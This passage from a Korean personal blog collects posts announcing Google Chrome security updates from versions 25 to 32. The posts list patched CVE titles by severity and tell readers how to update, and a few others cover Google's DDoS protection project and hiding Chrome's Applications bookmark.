  • Tab indicators for sound, webcam and casting (사운드, 웹캠, 캐스팅을 탭에 표기)
  • A different look for Win8 Metro mode (윈도우8의 메트로 모드 디자인 변화)
  • Automatically blocking malware files (악성코드 자동 차단)
  • A number of new apps/extension APIs (새로운 어플케이션 및 확장 API)
  • Lots of under the hood changes for stability and performance (안전성과 성능 변화)
※ 특히 악성코드 자동 차단 기능은 일반 사용자들에게는 박수칠 일이며, 분석가들에게는 비난 받을 ㅠ.ㅠ
예전에는 수동으로 삭제/계속을 선택할 수 있었는데, 지금은 매우 귀찮게 다운을 받아야 한다;;



취약점에 영향을 받는 낮은 버전 제품 사용시 악성코드 감염 등 보안 위협에 쉽게 노출될 수 있으니, 
해당 제품을 사용하시는 사용자들은 최신 버전으로 업데이트 후 사용하시기 바랍니다.

이번 보안 업데이트는 4건의 High 등급 등 총 11건의 보안 취약점과 자체 내장 된 Adobe Flash Player 12.0.0.41 버전이 패치되었네요
■ High CVE-2013-6646 : Use-after-free in web workers

■ High CVE-2013-6641 : Use-after-free related to forms

■ High CVE-2013-6642 : Address bar spoofing in Chrome for Android

■ High CVE-2013-6643 : Unprompted sync with an attacker's Google account



크롬을 사용하시는 분들은 업데이트 하여 사용하시길~!!

업데이트 방법은 크롬의 우측상단에 "Chrome 설정 및 관리" 에서 "Chrome 정보" 를 클릭하면 자동으로 업데이트 된다. 


블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.


구글에서 제공하는 오픈소스 기반 브라우저인 크롬(Google Chrome)의 업데이트가 공개되었다.

Google Chrome 브라우저가 31.0.1650.63  버전으로 업데이트 되었습니다.


취약점에 영향을 받는 낮은 버전 제품 사용시 악성코드 감염 등 보안 위협에 쉽게 노출될 수 있으니, 

해당 제품을 사용하시는 사용자들은 최신 버전으로 업데이트 후 사용하시기 바랍니다.


이번 보안 업데이트는 2건의 High 등급, 4건의 Medium 등급 등 총 15건의 보안 취약점이 패치되었네요

■ Medium CVE-2013-6634 : Session fixation in sync related to 302 redirects

■ High CVE-2013-6635 : Use-after-free in editing

■ Medium CVE-2013-6636 : Address bar spoofing related to modal dialogs

■ CVE-2013-6637 : Various fixes from internal audits, fuzzing and other initiatives

■ Medium CVE-2013-6638 : Buffer overflow in v8

■ High CVE-2013-6639 : Out of bounds write in v8

■ Medium CVE-2013-6640 : Out of bounds read in v8



크롬을 사용하시는 분들은 업데이트 하여 사용하시길~!!

업데이트 방법은 크롬의 우측상단에 "Chrome 설정 및 관리" 에서 "Chrome 정보" 를 클릭하면 자동으로 업데이트 된다. 



블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.



구글에서 제공하는 오픈소스 기반 브라우저인 크롬(Google Chrome)의 업데이트가 공개되었다.


Google Chrome 브라우저가 31.0.1650.481 버전으로 정식 업데이트 되었습니다.


취약점에 영향을 받는 낮은 버전 제품 사용시 악성코드 감염 등 보안 위협에 쉽게 노출될 수 있으니, 

해당 제품을 사용하시는 임직원께서는 최신 버전으로 업데이트 후 사용하시기 바랍니다.


이번 보안 업데이트는 6건의 High 등급, 1건의 Medium-Critical 등급, 4건의 Medium 등급, 1건의 Low 등급 등 총 25건의 보안
취약점과 자체 내장 된 Adobe Flash Player 11.9.900.152 버전이 패치되었네요

■ Medium CVE-2013-6621 : Use after free related to speech input elements

■ High CVE-2013-6622 : Use after free related to media elements

■ High CVE-2013-6623 : Out of bounds read in SVG. Credit to miaubiz

■ High CVE-2013-6624 : Use after free related to "id" attribute strings

■ Low CVE-2013-6626 : Address bar spoofing related to interstitial warnings

■ High CVE-2013-6627 : Out of bounds read in HTTP parsing

■ Medium CVE-2013-6628 : Issue with certificates not being checked during TLS renegotiation

■ Medium-Critical CVE-2013-2931 : Various fixes from internal audits, fuzzing and other initiatives.

■ Medium CVE-2013-6629 : Read of uninitialized memory in libjpeg and libjpeg-turbo

■ Medium CVE-2013-6630 : Read of uninitialized memory in libjpeg-turbo

■ High CVE-2013-6631 : Use after free in libjingle



크롬을 사용하시는 분들은 업데이트 하여 사용하시길~!!

업데이트 방법은 크롬의 우측상단에 "Chrome 설정 및 관리" 에서 "Chrome 정보" 를 클릭하면 자동으로 업데이트 된다. 



블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.


세계적인 검색 사이트를 운영하는 인터넷 기업 구글(google)에서 DDoS 공격을 무료로 막아주는 "보호막 프로젝트"를 공개했다.

구글의 "보호막 프로젝트" 는 사회 공헌 활동의 일환으로 디도스(DDoS)에 취약한 소뮤모 사이트들을 구글의 서버에 올림으로써
보호해 주는 프로젝트이다.

해당 프로젝트는 구글이 그 동안 충분하게 기술적으로 형성 된 페이지 스피드(Page Speed)라는 서비스위에 구성되어 있으며,

전세계에서 일어나고 있는 공격을 실시간으로 보여주는 디지털 공격 지도(Digital Attack Map)도 같이 발표했다.

디지털 공격 지도(Digital Attack Map) 홈페이지 : http://www.digitalattackmap.com
(아래는 디지털 공격 지도를 Embed Tag 를 이용하여 블로그 및 카페에도 실시간 데이터를 볼 수 있다)

블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.


구글에서 제공하는 오픈소스 기반 브라우저인 크롬(Google Chrome)의 업데이트가 공개되었다.

Google Chrome 브라우저가 30.0.1599.101 버전으로 업데이트 되었습니다.


취약점에 영향을 받는 낮은 버전 제품 사용시 악성코드 감염 등 보안 위협에 쉽게 노출될 수 있으니, 

해당 제품을 사용하시는 임직원께서는 최신 버전으로 업데이트 후 사용하시기 바랍니다.


이번 보안 업데이트는 3건의 High 등급 등 총 5건의 보안 취약점이 패치되었네요.

High CVE-2013-2925 : Use after free in XHR

High CVE-2013-2926 : Use after free in editing

■ High CVE-2013-2927 : Use after free in forms

이외 CVE-2013-2928 패치를 통해 여러 가지 수정들이 이루어졌습니다.



크롬을 사용하시는 분들은 업데이트 하여 사용하시길~!!

업데이트 방법은 크롬의 우측상단에 "Chrome 설정 및 관리" 에서 "Chrome 정보" 를 클릭하면 자동으로 업데이트 된다. 


블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.


구글에서 제공하는 오픈소스 기반 브라우저인 크롬(Google Chrome)의 업데이트가 공개되었다.


Google Chrome 브라우저가 30.0.1599.66 정식버전으로 업데이트 되었습니다.


이번 30버전에서는 보안취약점도 보안되었지만, 기능적인 부분도 추가되 된 것으로 확인 되네요.


  • Easier searching by image (더 쉬워진 이미지 검색 기능)
  • A number of new apps/extension APIs (다수의 새로운 어플리케이션과 확장 API 추가)
  • Lots of under the hood changes for stability and performance (안정성과 성능향상을 위한 변화)


취약점에 영향을 받는 낮은 버전 제품 사용시 악성코드 감염 등 보안 위협에 쉽게 노출될 수 있으니, 

해당 제품을 사용하시는 사용자분들은 최신 버전으로 업데이트 후 사용하시기 바랍니다.

이번 보안 업데이트는 10건의 High 등급, 7건의 Medium 등급, 1건의 Low 등급 등 총 50건의 보안 취약점이 패치되었네요.

■ Medium CVE-2013-2906 : Races in Web Audio

■ Medium CVE-2013-2907 : Out of bounds read in Window.prototype object

■ Medium CVE-2013-2908 : Address bar spoofing related to the "204 No Content" status code

■ High CVE-2013-2909 : Use after free in inline-block rendering

■ Medium CVE-2013-2910 : Use-after-free in Web Audio

■ High CVE-2013-2911 : Use-after-free in XSLT

■ High CVE-2013-2912 : Use-after-free in PPAPI

■ High CVE-2013-2913 : Use-after-free in XML document parsing

■ High CVE-2013-2914 : Use after free in the Windows color chooser dialog

■ Low CVE-2013-2915 : Address bar spoofing via a malformed scheme

■ High CVE-2013-2916 : Address bar spoofing related to the "204 No Content" status code

■ Medium CVE-2013-2917 : Out of bounds read in Web Audio

■ High CVE-2013-2918 : Use-after-free in DOM

■ High CVE-2013-2919 : Memory corruption in V8

■ Medium CVE-2013-2920 : Out of bounds read in URL parsing

■ High CVE-2013-2921 : Use-after-free in resource loader

■ High CVE-2013-2922 : Use-after-free in template element

■ Medium CVE-2013-2924 : Use-after-free in ICU



크롬을 사용하시는 분들은 업데이트 하여 사용하시길~!!

업데이트 방법은 크롬의 우측상단에 "Chrome 설정 및 관리" 에서 "Chrome 정보" 를 클릭하면 자동으로 업데이트 된다. 



블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.


구글에서 제공하는 오픈소스 기반 브라우저인 크롬(Google Chrome)이 새롭게 시작페이지를 디자인하면서 새로운 기능들이
추가되었다.

새로운 기능에 대해서는 차후 다시 쓰기로 하고, 이번에 쓸 내용은 새로운 기능 중에 "애플리케이션" 이라는 북마크가 생성되었는데
이 놈 때문에 나의 북마크 리스트가 뒤로 밀리는 사태가 발생했다.

나의 북마크를 다시 살리기 위해서라도 이놈을 꼭 지워야된다!!
그래서 아는 지인분이 알려주셧다^^
(사실 방법은 매우 간단했다;;)

아래와 같이 "애플리케이션" 이라는 북마크가 새롭게 보인다.



"애플리케이션" 북마크에서 마우스 우측버튼을 누르게 되면, 아래와 같이 "앱 단축키 표시" 라는 부분이 나오는데,
이 체크를 풀어주면 된다.




그럼 이제 "애플리케이션" 북마크가 내 눈에 안보인다!!! ㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋ



블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.


구글에서 제공하는 오픈소스 기반 브라우저인 크롬(Google Chrome)의 업데이트가 공개되었다.




원래 해당 보안업데이트 내역은 29.0.1547.57 버전의 내용이나, 포스팅을 늦게 하는 바람에 벌써 66버전까지 업데이트 되었다.

취약점 내용을 적기 위한 포스트이니, 참고하시기 바람.


취약점에 영향을 받는 낮은 버전 제품 사용시 악성코드 감염 등 보안 위협에 쉽게 노출될 수 있으니, 

해당 제품을 사용하시는 사용자분들은 최신 버전으로 업데이트 후 사용하시기 바랍니다.

이번 보안 업데이트는 5건의 High 등급, 1건의 Low 등급 등 총 25건의 보안 취약점이 패치되었네요.

High CVE-2013-2900 : Incomplete path sanitization in file handling

Low CVE-2013-2905 : Information leak via overly broad permissions on shared memory files

High CVE-2013-2901 : Integer overflow in ANGLE

High CVE-2013-2902 : Use after free in XSLT

High CVE-2013-2903 : Use after free in media element

High CVE-2013-2904 : Use after free in document parsing



크롬을 사용하시는 분들은 업데이트 하여 사용하시길~!!

업데이트 방법은 크롬의 우측상단에 "Chrome 설정 및 관리" 에서 "Chrome 정보" 를 클릭하면 자동으로 업데이트 된다. 



블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.


구글에서 제공하는 오픈소스 기반 브라우저인 크롬(Google Chrome)의 업데이트가 공개되었다.




Google Chrome 브라우저가 28.0.1500.95 버전으로 업데이트 되었습니다.


취약점에 영향을 받는 낮은 버전 제품 사용시 악성코드 감염 등 보안 위협에 쉽게 노출될 수 있으니, 

해당 제품을 사용하시는 사용자분들은 최신 버전으로 업데이트 후 사용하시기 바랍니다.

이번 보안 업데이트는 4건의 High 등급, 1건의 Medium 등급 등 총 11건의 보안 취약점이 패치되었네요.

Medium CVE-2013-2881 : Origin bypass in frame handling

High CVE-2013-2882 : Type confusion in V8

High CVE-2013-2883 : Use-after-free in MutationObserver

High CVE-2013-2884 : Use-after-free in DOM

High CVE-2013-2885 : Use-after-free in input handling



크롬을 사용하시는 분들은 업데이트 하여 사용하시길~!!

업데이트 방법은 크롬의 우측상단에 "Chrome 설정 및 관리" 에서 "Chrome 정보" 를 클릭하면 자동으로 업데이트 된다. 



블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.


구글에서 제공하는 오픈소스 기반 브라우저인 크롬(Google Chrome)의 업데이트가 공개되었다.





Google Chrome 브라우저가 28.0.1500.71 버전으로 업데이트 되었습니다.


이번 업데이트에서는 브라우저 자체의 플레시플레이어(Flash Player)버전이 11.8.800.97으로 업그레이드 되었으며 보안적인
업데이트도 진행 되었네요.


보안 업데이트는 1건의 Critical 등급, 3건의 High 등급, 7건의 Medium 등급, 3건의 Low 등급 등 총 14건의 보안 취약점이
패치 되었네요.

Low CVE-2013-2867: Block pop-unders in various scenarios.

High CVE-2013-2879: Confusion setting up sign-in and sync

Medium CVE-2013-2868: Incorrect sync of NPAPI extension component

Medium CVE-2013-2869: Out-of-bounds read in JPEG2000 handling

Critical CVE-2013-2870: Use-after-free with network sockets

Medium CVE-2013-2853: Man-in-the-middle attack against HTTP in SSL

High CVE-2013-2871: Use-after-free in input handling

Low CVE-2013-2872: Possible lack of entropy in renderers

High CVE-2013-2873: Use-after-free in resource loading

Medium CVE-2013-2874: Screen data leak with GL textures [Windows + NVIDIA only] 

Medium CVE-2013-2875: Out-of-bounds-read in SVG

Medium CVE-2013-2876: Extensions permissions confusion with interstitials

Low CVE-2013-2877: Out-of-bounds read in XML parsing

Medium CVE-2013-2878: Out-of-bounds read in text handling



크롬을 사용하시는 분들은 업데이트 하여 사용하시길~!!

업데이트 방법은 크롬의 우측상단에 "Chrome 설정 및 관리" 에서 "Chrome 정보" 를 클릭하면 자동으로 업데이트 된다. 



블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.



구글에서 제공하는 오픈소스 기반 브라우저인 크롬(Google Chrome)의 업데이트가 공개되었다.




Google Chrome 브라우저가 27.0.1453.110 버전으로 업데이트 되었습니다.


이번 업데이트에서는 기능적인 부분보다는 보안적인 업데이트가 중점이네요^^

업데이트는 1건의 Critical 등급, 10건의 High 등급, 1건의 Medium 등급 등 총 12건의 보안 취약점이 보안되었네요.

High CVE-2013-2854 : Bad handle passed to renderer [Windows only]

Medium CVE-2013-2855 : Memory corruption in dev tools API

High CVE-2013-2856 : Use-after-free in input handling

High CVE-2013-2857 : Use-after-free in image handling

High CVE-2013-2858 : Use-after-free in HTML5 Audio

High CVE-2013-2859 : Cross-origin namespace pollution

High CVE-2013-2860 : Use-after-free with workers accessing database APIs

High CVE-2013-2861 : Use-after-free with SVG

High CVE-2013-2862 : Memory corruption in Skia GPU handling.

Critical CVE-2013-2863 : Memory corruption in SSL socket handling

High CVE-2013-2864 : Bad free in PDF viewer

High CVE-2013-2865 : Various fixes from internal audits, fuzzing and other initiatives.



크롬을 사용하시는 분들은 업데이트 하여 사용하시길~!!

업데이트 방법은 크롬의 우측상단에 "Chrome 설정 및 관리" 에서 "Chrome 정보" 를 클릭하면 자동으로 업데이트 된다. 




블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.



구글에서 제공하는 오픈소스 기반 브라우저인 크롬(Google Chrome)의 업데이트가 공개되었다.


Google Chrome 브라우저가 27.0.1453.93 정식버전으로 업데이트 되었습니다.


이번 27버전에서는 보안취약점도 보안되었지만, 기능적인 부분도 추가되 된 것으로 확인 되네요.


- 웹페이지 로드가 평균 5% 향상 (Web pages load 5% faster on average)


- chrome.syncFileSystem API 추가 (chrome.syncFileSystem API)


- 주소창 예측 기능, 맞춤법 교정 기능 등 기능적인 부분 향상 (Improved ranking of predictions, improved spell correction, 

and numerous fundamental improvements for Omnibox predictions. Please see the Help Center for more information on our 

updated policies)



또한 이번 업데이트는 11건의 High 등급, 2건의 Medium 등급, 1건의 Low등급 등 총 14건의 보안 취약점이 보안되었네요.

■ High CVE-2013-2837 : Use-after-free in SVG


■ Medium CVE-2013-2838 : Out-of-bounds read in v8


■ High CVE-2013-2839 : Bad cast in clipboard handling


■ High CVE-2013-2840 : Use-after-free in media loader


■ High CVE-2013-2841 : Use-after-free in Pepper resource handling


■ High CVE-2013-2842 : Use-after-free in widget handling


■ High CVE-2013-2843 : Use-after-free in speech handling


■ High CVE-2013-2844 : Use-after-free in style resolution


■ High CVE-2013-2845 : Memory safety issues in Web Audio


■ High CVE-2013-2846 : Use-after-free in media loader


■ High CVE-2013-2847 : Use-after-free race condition with workers


■ Medium CVE-2013-2848 : Possible data extraction with XSS Auditor


■ Low CVE-2013-2849 : Possible XSS with drag+drop or copy+paste


■ High CVE-2013-2836 : Various fixes from internal audits, fuzzing and other initiatives.



크롬을 사용하시는 분들은 업데이트 하여 사용하시길~!!

업데이트 방법은 크롬의 우측상단에 "Chrome 설정 및 관리" 에서 "Chrome 정보" 를 클릭하면 자동으로 업데이트 된다. 




블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.


구글에서 제공하는 오픈소스 기반 브라우저인 크롬(Google Chrome)의 업데이트가 공개되었다.




Google Chrome 브라우저가 26.0.1410.43 정식버전으로 업데이트 되었습니다.

이번 26버전에서는 보안취약점도 보안되었지만, 기능적인 부분도 추가되 된 것으로 확인 되네요.

- 새로운 기능인 "구글에게 뭐든지 물어보세요"라는 메뉴텝 추가 
- 멀티 유저 지원 및 다양한 버그 픽스와 더욱 안전하게 보안 강화
- 사전 어플에는 한국어도 처음으로 지원하며 문장 문법 검사 추가

모바일 기기와의 동기화와 호환성도 한층 나아져 쉽고 신속하게 모바일 기기로 보낼 수 있게 디자인 되었
다고 한다.

또한 이번 업데이트는 2건의 High 등급, 4건의 Medium 등급, 5건의 Low등급 등 총 11건의 보안 취약점이 보안되었다.

High CVE-2013-0916 : Use-after-free in Web Audio


Low CVE-2013-0917 : Out-of-bounds read in URL loader


Low CVE-2013-0918 : Do not navigate dev tools upon drag and drop


Medium CVE-2013-0919 : Use-after-free with pop-up windows in extensions [Linux only]


Medium CVE-2013-0920 : Use-after-free in extension bookmarks API


High CVE-2013-0921 : Ensure isolated web sites run in their own processes


Low CVE-2013-0922 : Avoid HTTP basic auth brute force attempts


Medium CVE-2013-0923 : Memory safety issues in the USB Apps API


Low CVE-2013-0924 : Check an extension's permissions API usage again file permissions


Low CVE-2013-0925 : Avoid leaking URLs to extensions without the tabs permissions


Medium CVE-2013-0926 : Avoid pasting active tags in certain situations


크롬을 사용하시는 분들은 업데이트 하여 사용하시길~!!

업데이트 방법은 크롬의 우측상단에 "Chrome 설정 및 관리" 에서 "Chrome 정보" 를 클릭하면 자동으로 업데이트 된다. 

 
 
블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.


구글에서 제공하는 오픈소스 기반 브라우저인 크롬(Google Chrome)의 업데이트가 공개되었다.


이번 업데이트는 6건의 High 등급, 3건의 Medium 등급, 1건의 Low등급 등 총 10건의 보안 취약점이 보안되었다.

High CVE-2013-0902 : Use-after-free in frame loader


High CVE-2013-0903
: Use-after-free in browser navigation handling


High CVE-2013-0904
: Memory corruption in Web Audio


High CVE-2013-0905
: Use-after-free with SVG animations


High CVE-2013-0906
: Memory corruption in Indexed DB


Medium CVE-2013-0907
: Race condition in media thread handling


Medium CVE-2013-0908
: Incorrect handling of bindings for extension processes


Low CVE-2013-0909
: Referer leakage with XSS Auditor


Medium CVE-2013-0910
: Mediate renderer -> browser plug-in loads more strictly


High CVE-2013-0911
: Possible path traversal in database handling



크롬을 사용하시는 분들은 업데이트 하여 사용하시길~!!

업데이트 방법은 크롬의 우측상단에 "Chrome 설정 및 관리" 에서 "Chrome 정보" 를 클릭하면 자동으로 업데이트 된다.



블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.


구글에서 제공하는 오픈소스 기반 브라우저인 크롬(Google Chrome)의 업데이트가 공개되었다.



Google Chrome 브라우저가 25.0.1364.97로 정식 버전이 업데이트되었습니다.

이번 25버전에서는 보안취약점도 보안되었지만, 기능적인 부분도 대폭 추가 된 것으로 확인 되네요.
  • Better support for HTML5 time/date inputs (HTML5 시간/날짜 입력 개선)
  • Better WebGL error handling (WebGL 오류처리 개선)

특히 확장프로그램 관리에서는 사용자가 추가 한 프로그램인지, 제 3자에 의해 설치 된 프로그램인지 확인이 가능하며
음성 지원도 재미있네요^^ 음성지원은 아래의 영상으로 참고하세요.


또한 이번 업데이트는 10건의 High 등급, 7건의 Medium 등급, 5건의 Low등급 등 총 22건의 보안 취약점이 보안되었다.

High CVE-2013-0879 : Memory corruption with web audio node


High CVE-2013-0880 : Use-after-free in database handling


Medium CVE-2013-0881 : Bad read in Matroska handling


High CVE-2013-0882 : Bad memory access with excessive SVG parameters


Medium CVE-2013-0883 : Bad read in Skia


Low CVE-2013-0884 : Inappropriate load of NaCl


Medium CVE-2013-0885 : Too many API permissions granted to web store


Medium CVE-2013-0886 : Incorrect NaCl signal handling [Mac only]


Low CVE-2013-0887 : Developer tools process has too many permissions and places too much trust in the connected server


Medium CVE-2013-0888 : Out-of-bounds read in Skia


Low CVE-2013-0889 : Tighten user gesture check for dangerous file downloads


High CVE-2013-0890 : Memory safety issues across the IPC layer


High CVE-2013-0891 : Integer overflow in blob handling


Medium CVE-2013-0892 : Lower severity issues across the IPC layer


Medium CVE-2013-0893 : Race condition in media handling


High CVE-2013-0894 : Buffer overflow in vorbis decoding


High CVE-2013-0895 : Incorrect path handling in file copying [Linux / Mac]


High CVE-2013-0896 : Memory management issues in plug-in message handling


Low CVE-2013-0897 : Off-by-one read in PDF


High CVE-2013-0898 : Use-after-free in URL handling


Low CVE-2013-0899 : Integer overflow in Opus handling


Medium CVE-2013-0900 : Race condition in ICU


크롬을 사용하시는 분들은 업데이트 하여 사용하시길~!!
업데이트 방법은 크롬의 우측상단에 "Chrome 설정 및 관리" 에서 "Chrome 정보" 를 클릭하면 자동으로 업데이트 된다.



블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.